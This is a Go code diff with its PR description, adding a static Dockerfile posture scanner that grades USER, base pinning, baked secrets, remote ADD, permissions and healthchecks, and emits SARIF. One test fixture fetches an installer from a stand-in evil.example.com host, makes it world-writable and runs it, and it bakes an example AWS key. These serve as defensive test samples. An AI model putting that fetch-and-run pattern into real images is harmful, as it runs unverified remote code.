+	grade func(DockerfileSpec) (int, Verdict, string)
+}
+
+// dfScorers is the ordered Dockerfile dimension set. Weights sum to 100. The
+// heavy weights sit on the postures that ship a compromise INTO the image: the
+// shipped USER (a root default = every runtime escape starts as uid 0), an
+// unpinned base (silent supply-chain drift), and a baked-in secret (credential
+// leaked in a layer). HEALTHCHECK/bloat are liveness/quality, weighted low.
+var dfScorers = []dfScorer{
+	{"dockerfile.user", "Non-root USER", 25,
+		"USER 65532:65532  (declare a non-root uid in the final stage)", gradeDfUser},
+	{"dockerfile.base.pinned", "Pinned base image", 20,
+		"FROM image@sha256:<digest>  (pin to an immutable digest)", gradeDfBase},
+	{"dockerfile.secrets", "No secrets in ENV/ARG", 20,
+		"remove secret-valued ENV/ARG; inject at runtime (env/--mount=type=secret)", gradeDfSecrets},
+	{"dockerfile.add", "COPY over remote/opaque ADD", 12,
+		"replace ADD with COPY; fetch remote files with a checksum-verified RUN", gradeDfAdd},
+	{"dockerfile.permissions", "No world-writable files", 10,
+		"drop chmod 777; use COPY --chown and least-privilege modes", gradeDfPerms},
+	{"dockerfile.healthcheck", "HEALTHCHECK defined", 8,
+		"HEALTHCHECK CMD <liveness probe>", gradeDfHealth},
+	{"dockerfile.bloat", "Layer / cache hygiene", 5,
+		"chain package-cache cleanup into the install RUN", gradeDfBloat},
+}
+
+// staticCeilingNote is appended to every Dockerfile report. It is the honest
+// ceiling the issue calls for: a static scan cannot see runtime hardening, so a
+// high grade here is necessary but not sufficient.
+const staticCeilingNote = "static Dockerfile scan grades AUTHORING-TIME posture only. Runtime hardening (dropped capabilities, seccomp, network=none, read-only rootfs, no docker.sock, no shared host namespaces) is set at `docker run` / orchestration time and is NOT expressible in a Dockerfile, so it is not graded here. A high static grade still requires a runtime scan: `ironctl scan <container>`."
+
+// ScoreDockerfile grades a DockerfileSpec across every authoring-time dimension
+// and returns the full Report. Pure: no I/O, no clock, deterministic for a given
+// spec. Reuses the shared 0-100/A-F bands and Report shape so every output path
+// (table/json/md/badge/sarif) works unchanged.
+func ScoreDockerfile(s DockerfileSpec) Report {
+	r := Report{
+		Source: s.Source,
+		Target: s.Target,
+		Max:    TotalWeight,
+		Notes:  append([]string(nil), s.Notes...),
+	}
+	sum := 0
+	for _, sc := range dfScorers {
+		pts, v, detail := sc.grade(s)
+		if pts < 0 {
+			pts = 0
+		}
+		if pts > sc.max {
+			pts = sc.max
+		}
+		sum += pts
+		r.Dimensions = append(r.Dimensions, Dimension{
+			Key: sc.key, Title: sc.title, Verdict: v, Score: pts, Max: sc.max, Detail: detail,
+		})
+	}
+	r.Score = sum
+	r.Grade = grade(sum)
+	r.Notes = append(r.Notes, staticCeilingNote)
+	return r
+}
+
+// dockerfileDimFix returns the concrete fix for a Dockerfile dimension key, for
+// the SARIF help text. Returns ("", "") for an unknown key.
+func dockerfileDimFix(key string) string {
+	for _, sc := range dfScorers {
+		if sc.key == key {
+			return sc.fix
+		}
+	}
+	return ""
+}
+
+// --------------------------------------------------------------------------- //
+// Dimension scorers.
+// --------------------------------------------------------------------------- //
+
+func gradeDfUser(s DockerfileSpec) (int, Verdict, string) {
+	u := strings.TrimSpace(s.FinalUser)
+	if u != "" {
+		// A USER instruction is present in the final stage.
+		name := u
+		if i := strings.Index(name, ":"); i >= 0 { // strip :gid
+			name = name[:i]
+		}
+		if name == "0" || strings.EqualFold(name, "root") {
+			return 0, VerdictFail, fmt.Sprintf("final stage sets USER %s: the image runs as root", u)
+		}
+		return 25, VerdictPass, fmt.Sprintf("final stage runs as USER %s (non-root)", u)
+	}
+	// No explicit USER: the image inherits the base default.
+	if s.BaseLooksNonRoot {
+		return 20, VerdictWarn, fmt.Sprintf("no USER set; base %q advertises a non-root default. Add an explicit USER to be sure", s.BaseImage)
+	}
+	return 0, VerdictFail, "no USER instruction: the image defaults to root (uid 0)"
+}
+
+func gradeDfBase(s DockerfileSpec) (int, Verdict, string) {
+	switch s.BasePin {
+	case "digest":
+		return 20, VerdictPass, fmt.Sprintf("base pinned to an immutable digest (%s)", shortRef(s.BaseImage))
+	case "scratch":
+		return 20, VerdictPass, "base is scratch: no base packages, minimal attack surface"
+	case "tag":
+		return 14, VerdictWarn, fmt.Sprintf("base pinned by mutable tag (%s); prefer an @sha256 digest for reproducibility", shortRef(s.BaseImage))
+	case "latest":
+		return 0, VerdictFail, fmt.Sprintf("base %q is unpinned (:latest / implicit): non-reproducible, silent drift", s.BaseImage)
+	default:
+		return 0, VerdictUnknown, "base image not determinable; assuming unpinned (fail-closed)"
+	}
+}
+
+func gradeDfSecrets(s DockerfileSpec) (int, Verdict, string) {
+	if len(s.Secrets) == 0 {
+		return 20, VerdictPass, "no secret-like literal values in ENV/ARG"
+	}
+	return 0, VerdictFail, fmt.Sprintf("secret-like literal(s) baked into ENV/ARG: %s (persists in image layers / build history)", strings.Join(s.Secrets, ", "))
+}
+
+func gradeDfAdd(s DockerfileSpec) (int, Verdict, string) {
+	if len(s.RemoteADD) > 0 {
+		return 0, VerdictFail, fmt.Sprintf("remote ADD fetches over the network into a layer (no checksum, MITM): %s", strings.Join(s.RemoteADD, ", "))
+	}
+	if len(s.LocalADD) > 0 {
+		return 8, VerdictWarn, fmt.Sprintf("ADD used for local path(s) %s: auto-extracts archives and hides intent; prefer COPY", strings.Join(s.LocalADD, ", "))
+	}
+	return 12, VerdictPass, "no remote or archive-extracting ADD (COPY used for local files)"
+}
+
+func gradeDfPerms(s DockerfileSpec) (int, Verdict, string) {
+	if len(s.WorldWritable) > 0 {
+		return 0, VerdictFail, fmt.Sprintf("world-writable permissions granted: %s (any in-container user can tamper)", strings.Join(s.WorldWritable, ", "))
+	}
+	return 10, VerdictPass, "no world-writable (chmod 777 / o+w) permissions"
+}
+
+func gradeDfHealth(s DockerfileSpec) (int, Verdict, string) {
+	if s.Healthcheck {
+		return 8, VerdictPass, "HEALTHCHECK declared: orchestrators can detect a wedged container"
+	}
+	return 0, VerdictWarn, "no HEALTHCHECK: a hung process is invisible to the orchestrator"
+}
+
+func gradeDfBloat(s DockerfileSpec) (int, Verdict, string) {
+	if len(s.DirtyPkg) == 0 {
+		return 5, VerdictPass, "no unpruned package caches detected"
+	}
+	return 2, VerdictWarn, fmt.Sprintf("package cache left in layer: %s", strings.Join(s.DirtyPkg, "; "))
+}
+
+// RenderSARIFDockerfile writes a SARIF 2.1.0 log for a Dockerfile report to w.
+// It mirrors RenderSARIF but is driven by the Dockerfile dimension set (dfScorers)
+// and anchors every result at the Dockerfile itself. One rule per dimension; one
+// result per non-PASS dimension. A clean 100/A Dockerfile yields zero results.
+// Deterministic: no clock, stable per-(rule,file) fingerprints.
+func RenderSARIFDockerfile(w io.Writer, r Report, opts SARIFOptions) error {
+	driver := sarifDriver{
+		Name:           "ironctl-scan",
+		Version:        r.Version,
+		InformationURI: scanDocsURL,
+	}
+	ruleIndex := make(map[string]int, len(dfScorers))
+	for i, sc := range dfScorers {
+		ruleIndex[sc.key] = i
+		driver.Rules = append(driver.Rules, sarifRule{
+			ID:               sc.key,
+			Name:             sarifRuleName(sc.key),
+			ShortDescription: sarifText{Text: sc.title},
+			FullDescription:  sarifText{Text: sc.title},
+			Help: sarifMsg{
+				Text:     fmt.Sprintf("Fix: %s\nMore: %s", sc.fix, scanDocsURL),
+				Markdown: fmt.Sprintf("**Fix:** `%s`\n\n[Hardening guide](%s)", sc.fix, scanDocsURL),
+			},
+			DefaultConfiguration: sarifRuleConfig{Level: sarifSeverity(sc.max)},
+			Properties:           sarifRuleProps{Tags: []string{"security", "containment", "dockerfile", "ironclaw"}},
+		})
+	}
+
+	results := []sarifResult{}
+	for _, d := range r.Dimensions {
+		if d.Verdict == VerdictPass {
+			continue
+		}
+		idx := ruleIndex[d.Key]
+		results = append(results, sarifResult{
+			RuleID:    d.Key,
+			RuleIndex: idx,
+			Level:     sarifResultLevel(d.Verdict, dfScorers[idx].max),
+			Message: sarifText{Text: fmt.Sprintf("%s (%s): %s. Fix: %s",
+				d.Title, d.Verdict, d.Detail, dfScorers[idx].fix)},
+			Locations:           []sarifLocation{dockerfileSARIFLoc(opts, r.Target)},
+			PartialFingerprints: map[string]string{"ironclawScan/v1": sarifFingerprint(d.Key, opts.ConfigFile)},
+		})
+	}
+
+	out, err := json.MarshalIndent(sarifLog{
+		Schema:  "https://json.schemastore.org/sarif-2.1.0.json",
+		Version: "2.1.0",
+		Runs:    []sarifRun{{Tool: sarifTool{Driver: driver}, Results: results}},
+	}, "", "  ")
+	if err != nil {
+		return err
+	}
+	_, err = w.Write(append(out, '\n'))
+	return err
+}
+
+func dockerfileSARIFLoc(opts SARIFOptions, target string) sarifLocation {
+	if opts.ConfigFile != "" {
+		pl := &sarifPhysical{ArtifactLocation: sarifArtifact{URI: opts.ConfigFile}}
+		if opts.AnchorLine > 0 {
+			pl.Region = &sarifRegion{StartLine: opts.AnchorLine}
+		}
+		return sarifLocation{PhysicalLocation: pl}
+	}
+	name := nz(target, "Dockerfile")
+	return sarifLocation{LogicalLocations: []sarifLogical{{Name: name, FullyQualifiedName: "dockerfile/" + name}}}
+}
+
+// shortRef trims a long image@digest to something readable in a table cell.
+func shortRef(ref string) string {
+	if i := strings.Index(ref, "@sha256:"); i >= 0 {
+		digest := ref[i+len("@sha256:"):]
+		if len(digest) > 12 {
+			digest = digest[:12] + "…"
+		}
+		return ref[:i] + "@sha256:" + digest
+	}
+	return ref
+}

--- a/internal/host/scan/dockerfile_test.go
+++ b/internal/host/scan/dockerfile_test.go
@@ -1,0 +1,232 @@
+package scan
+
+import (
+	"bytes"
+	"encoding/json"
+	"strings"
+	"testing"
+)
+
+const dfHardened = `# a well-authored image
+FROM golang:1.23@sha256:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa AS build
+WORKDIR /src
+COPY . .
+RUN go build -o /app ./cmd
+
+FROM gcr.io/distroless/static@sha256:bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
+COPY --from=build --chown=65532:65532 /app /app
+USER 65532:65532
+HEALTHCHECK CMD ["/app", "-healthcheck"]
+ENTRYPOINT ["/app"]
+`
+
+const dfWideOpen = `FROM ubuntu:latest
+RUN apt-get update && apt-get install -y curl
+ADD https://evil.example.com/installer.sh /tmp/installer.sh
+RUN chmod 777 /tmp/installer.sh && /tmp/installer.sh
+ENV AWS_SECRET_ACCESS_KEY=AKIAIOSFODNN7EXAMPLE
+CMD ["/bin/bash"]
+`
+
+const dfNoUserNoTag = `FROM node
+COPY . /app
+CMD ["node", "/app/index.js"]
+`
+
+func TestSpecFromDockerfile_Hardened(t *testing.T) {
+	s, err := SpecFromDockerfile([]byte(dfHardened), "Dockerfile")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if s.Stages != 2 {
+		t.Errorf("stages=%d want 2", s.Stages)
+	}
+	if s.FinalUser != "65532:65532" {
+		t.Errorf("FinalUser=%q want 65532:65532", s.FinalUser)
+	}
+	if s.BasePin != "digest" {
+		t.Errorf("BasePin=%q want digest", s.BasePin)
+	}
+	if !s.Healthcheck {
+		t.Error("HEALTHCHECK not detected")
+	}
+	if len(s.Secrets) != 0 || len(s.RemoteADD) != 0 || len(s.WorldWritable) != 0 {
+		t.Errorf("unexpected findings: %+v", s)
+	}
+	r := ScoreDockerfile(s)
+	if r.Grade != "A" || r.Score != 100 {
+		t.Errorf("hardened Dockerfile scored %d/%s, want 100/A", r.Score, r.Grade)
+	}
+}
+
+func TestSpecFromDockerfile_WideOpen(t *testing.T) {
+	s, err := SpecFromDockerfile([]byte(dfWideOpen), "Dockerfile")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if s.FinalUser != "" {
+		t.Errorf("FinalUser=%q want empty (root default)", s.FinalUser)
+	}
+	if s.BasePin != "latest" {
+		t.Errorf("BasePin=%q want latest", s.BasePin)
+	}
+	if len(s.RemoteADD) != 1 {
+		t.Errorf("RemoteADD=%v want 1", s.RemoteADD)
+	}
+	if len(s.WorldWritable) != 1 {
+		t.Errorf("WorldWritable=%v want 1", s.WorldWritable)
+	}
+	if len(s.Secrets) != 1 || s.Secrets[0] != "AWS_SECRET_ACCESS_KEY" {
+		t.Errorf("Secrets=%v want [AWS_SECRET_ACCESS_KEY]", s.Secrets)
+	}
+	r := ScoreDockerfile(s)
+	if r.Grade != "F" {
+		t.Errorf("wide-open Dockerfile graded %s (%d), want F", r.Grade, r.Score)
+	}
+}
+
+func TestSpecFromDockerfile_NoUserNoTag(t *testing.T) {
+	s, err := SpecFromDockerfile([]byte(dfNoUserNoTag), "Dockerfile")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if s.BasePin != "latest" {
+		t.Errorf("BasePin=%q want latest (implicit :latest on `node`)", s.BasePin)
+	}
+	r := ScoreDockerfile(s)
+	if dimByKey(r, "dockerfile.user").Verdict != VerdictFail {
+		t.Error("no USER should FAIL (root default)")
+	}
+	if dimByKey(r, "dockerfile.base.pinned").Verdict != VerdictFail {
+		t.Error("implicit :latest should FAIL")
+	}
+}
+
+func TestGradeDfBase_Table(t *testing.T) {
+	cases := []struct {
+		ref     string
+		wantPin string
+		wantV   Verdict
+	}{
+		{"alpine@sha256:deadbeef", "digest", VerdictPass},
+		{"scratch", "scratch", VerdictPass},
+		{"alpine:3.19", "tag", VerdictWarn},
+		{"alpine:latest", "latest", VerdictFail},
+		{"alpine", "latest", VerdictFail},
+		{"registry.example.com:5000/team/app:1.2", "tag", VerdictWarn},
+		{"registry.example.com:5000/team/app", "latest", VerdictFail},
+	}
+	for _, c := range cases {
+		if got := classifyPin(c.ref); got != c.wantPin {
+			t.Errorf("classifyPin(%q)=%q want %q", c.ref, got, c.wantPin)
+		}
+		_, v, _ := gradeDfBase(DockerfileSpec{BaseImage: c.ref, BasePin: classifyPin(c.ref)})
+		if v != c.wantV {
+			t.Errorf("gradeDfBase(%q) verdict=%s want %s", c.ref, v, c.wantV)
+		}
+	}
+}
+
+func TestSpecFromDockerfile_DistrolessNonrootNoUser(t *testing.T) {
+	df := "FROM gcr.io/distroless/static:nonroot\nCOPY app /app\nHEALTHCHECK CMD [\"/app\"]\n"
+	s, err := SpecFromDockerfile([]byte(df), "Dockerfile")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !s.BaseLooksNonRoot {
+		t.Error("distroless :nonroot base should be flagged non-root")
+	}
+	r := ScoreDockerfile(s)
+	// No explicit USER but a nonroot base: partial credit (WARN), not a hard FAIL.
+	if d := dimByKey(r, "dockerfile.user"); d.Verdict != VerdictWarn {
+		t.Errorf("nonroot base without USER graded %s, want WARN", d.Verdict)
+	}
+}
+
+func TestSpecFromDockerfile_Errors(t *testing.T) {
+	if _, err := SpecFromDockerfile([]byte("# just a comment\nRUN echo hi\n"), "Dockerfile"); err == nil {
+		t.Error("expected error when there is no FROM instruction")
+	}
+}
+
+func TestSpecFromDockerfile_LineContinuation(t *testing.T) {
+	df := "FROM debian:12\n" +
+		"RUN apt-get update \\\n" +
+		"  && apt-get install -y curl \\\n" +
+		"  && chmod 777 /opt\n"
+	s, err := SpecFromDockerfile([]byte(df), "Dockerfile")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(s.WorldWritable) != 1 {
+		t.Errorf("continuation-joined RUN should surface chmod 777: %+v", s.WorldWritable)
+	}
+	if len(s.DirtyPkg) != 1 {
+		t.Errorf("apt install with no cache prune should be flagged dirty; DirtyPkg=%v", s.DirtyPkg)
+	}
+}
+
+func TestScoreDockerfile_CeilingNote(t *testing.T) {
+	s, _ := SpecFromDockerfile([]byte(dfHardened), "Dockerfile")
+	r := ScoreDockerfile(s)
+	found := false
+	for _, n := range r.Notes {
+		if strings.Contains(n, "runtime scan") {
+			found = true
+		}
+	}
+	if !found {
+		t.Error("report must carry the honest static-ceiling note pointing at a runtime scan")
+	}
+}
+
+func TestSpecFromDockerfile_SecretHeuristics(t *testing.T) {
+	cases := []struct {
+		line   string
+		secret bool
+	}{
+		{"ENV API_KEY=sk_live_abc123", true},
+		{"ENV DB_PASSWORD=hunter2", true},
+		{`ARG GITHUB_TOKEN="ghp_xxx"`, true},
+		{"ENV PATH=/usr/local/bin", false},    // not a secret key
+		{"ENV SECRET_KEY=${INJECTED}", false}, // build-arg reference, not baked
+		{"ARG BUILD_SECRET", false},           // declaration only, no value
+		{"ENV LANG en_US.UTF-8", false},       // legacy form, not a secret
+	}
+	for _, c := range cases {
+		df := "FROM alpine:3.19\n" + c.line + "\n"
+		s, err := SpecFromDockerfile([]byte(df), "Dockerfile")
+		if err != nil {
+			t.Fatal(err)
+		}
+		got := len(s.Secrets) > 0
+		if got != c.secret {
+			t.Errorf("%q: secret=%v want %v (secrets=%v)", c.line, got, c.secret, s.Secrets)
+		}
+	}
+}
+
+func TestRenderSARIFDockerfile(t *testing.T) {
+	s, _ := SpecFromDockerfile([]byte(dfWideOpen), "Dockerfile")
+	r := ScoreDockerfile(s)
+	var buf bytes.Buffer
+	if err := RenderSARIFDockerfile(&buf, r, SARIFOptions{ConfigFile: "Dockerfile"}); err != nil {
+		t.Fatal(err)
+	}
+	var log map[string]any
+	if err := json.Unmarshal(buf.Bytes(), &log); err != nil {
+		t.Fatalf("SARIF is not valid JSON: %v", err)
+	}
+	if !strings.Contains(buf.String(), "dockerfile.user") {
+		t.Error("SARIF should carry the dockerfile.user rule")
+	}
+	// A clean report must still marshal results as [] (not null).
+	cs, _ := SpecFromDockerfile([]byte(dfHardened), "Dockerfile")
+	var clean bytes.Buffer
+	if err := RenderSARIFDockerfile(&clean, ScoreDockerfile(cs), SARIFOptions{ConfigFile: "Dockerfile"}); err != nil {
+		t.Fatal(err)
+	}
+	if !strings.Contains(clean.String(), `"results": []`) {
+		t.Error("clean Dockerfile SARIF must emit results: [] not null")
+	}
+}


### PR DESCRIPTION
## What

Adds `ironctl scan --dockerfile FILE...` — a **static, daemon-free** Dockerfile posture grader. It parses a Dockerfile and grades authoring-time containment posture on the shared 0-100 / A-F engine, **no running daemon and no image pull**, so it runs at authoring time and in CI on a PR (shift-left). Opens fresh organic-discovery surface (dockerfile security scanner).

## Why a different dimension set (honest ceilings)

Runtime hardening (dropped caps, seccomp, `network=none`, read-only rootfs, docker.sock, host namespaces) is a `docker run` / orchestration concern and is **statically undecidable** from a Dockerfile. Grading a Dockerfile against those would either fail every Dockerfile or fake a pass. So this mode grades the postures an author actually controls, and every scorecard prints an honest note that a high static grade still needs a runtime scan (`ironctl scan <container>`).

| Dimension | Weight |
|---|---|
| Non-root USER | 25 |
| Pinned base image (`@sha256` > tag > `:latest`) | 20 |
| No secrets in ENV/ARG (heuristic) | 20 |
| COPY over remote/opaque ADD | 12 |
| No world-writable files (`chmod 777`) | 10 |
| HEALTHCHECK defined | 8 |
| Layer / cache hygiene | 5 |

## Scope

- Reuses every output path: `--json --md --badge --badge-json --sarif --min-score`, plus a Dockerfile-specific SARIF renderer over the same rule set.
- Multi-stage: grades the **final (shipped) stage** for USER/base/HEALTHCHECK; secret + remote-fetch checks run across all stages. Full multi-stage dataflow and hadolint-style linting are out of scope — this grades containment posture only.
- Files are positionals so a pre-commit hook can batch them; `--min-score` trips if ANY file is below the bar.

## Verification

- `go build ./...` green (CGO_ENABLED=1); `go test ./internal/host/scan/... ./cmd/ironctl/...` — 223 pass.
- Table-driven tests over good/bad Dockerfiles; secret heuristics, base-pin classification, line-continuation joining, SARIF `results: []` on clean.
- E2E: hardened Dockerfile → 100/A; wide-open (root, `:latest`, remote ADD, baked `AWS_SECRET_ACCESS_KEY`, `chmod 777`) → 2/F; repo's own `container/Dockerfile` → honest 92/A (flags missing HEALTHCHECK). `--min-score` gate exits non-zero on a porous file.
- `mkdocs build --strict` passes; README + `docs/scan.md` snippets added.

## Security lenses

Read-only static analyzer. Touches **no** trust boundary — no queue access, no gateway path, no key custody, no egress. Does not weaken any isolation boundary. Fail-closed: an undeterminable base image grades UNKNOWN (as insecure).

Ref: `internal/host/scan/{docker,compose,k8s}.go`, `cmd/ironctl/scan.go`.

---

## IRO-494 — publish the pre-commit hook (stacked on IRO-493)

Distributes the `--dockerfile` mode as a [pre-commit](https://pre-commit.com) hook — a non-gated channel (installs by repo URL, no account/approval to publish), so `ironctl scan --dockerfile` drops into any repo's `.pre-commit-config.yaml`.

- **`.pre-commit-hooks.yaml`** — root manifest exposing `ironclaw-scan-dockerfile`. `language: golang` builds `ironctl` from source (no separate install step). Matches `Dockerfile` / `Dockerfile.*` / `*.Dockerfile`; `args: [--min-score=N]` gates the commit.
- **`.pre-commit-config.yaml`** — dogfoods the hook on this repo (`repo: local`, `go run ./cmd/ironctl`), gating the three shipped images at `--min-score=80` (they score 92/A, 92/A, 86/B).
- **docs/scan.md + README** — "Use as a pre-commit hook" section (install, gate semantics, dogfood pointer).
- CLI change: `--dockerfile` is a boolean grading positional file(s), so a hook can append matched filenames after fixed `--min-score` args and grade a batch (fails on the first file below threshold, naming it).

### Verification
- `pre-commit try-repo . ironclaw-scan-dockerfile --files <hardened Dockerfile>` → **Passed** (golang env builds `ironctl` from source).
- Consumer repo referencing this hook with `args: [--min-score=90]` against a porous Dockerfile → **Failed**, exit 1, scorecard printed, offending file named.
- `pre-commit run ironclaw-scan-dockerfile --all-files` (dogfood) → **Passed** on all three repo Dockerfiles.
- `go test ./internal/host/scan/... ./cmd/ironctl/...` → 223 pass · `go vet` clean · `mkdocs build --strict` clean.
